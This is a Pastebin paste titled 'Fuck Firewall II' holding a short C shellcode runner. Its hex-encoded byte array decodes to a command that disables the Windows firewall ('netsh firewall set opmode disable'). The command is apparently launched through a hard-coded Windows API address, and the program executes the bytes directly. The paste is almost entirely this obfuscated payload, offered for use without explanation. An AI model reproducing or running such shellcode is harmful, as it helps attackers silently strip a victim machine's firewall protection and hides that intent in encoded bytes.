Advertisement
MarkoAlvarez

Fuck Firewall II

Nov 17th, 2014
165
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.55 KB | None | 0 0
  1. Code:
  2.  
  3. #include <stdio.h>
  4. char code[] = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c"
  5. "\xff\xd3\xe8\xe5\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x73"
  6. "\x68\x20\x66\x69\x72\x65\x77\x61\x6c\x6c\x20\x73\x65\x74\x20\x6f\x70\x6d\x6f\x64\x65\x20"
  7. "\x64\x69\x73\x61\x62\x6c\x65\x00";
  8.  
  9. int main(int argc, char **argv)
  10. {
  11. int (*func)();
  12. func = (int (*)()) code;
  13. (int)(*func)();
  14. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement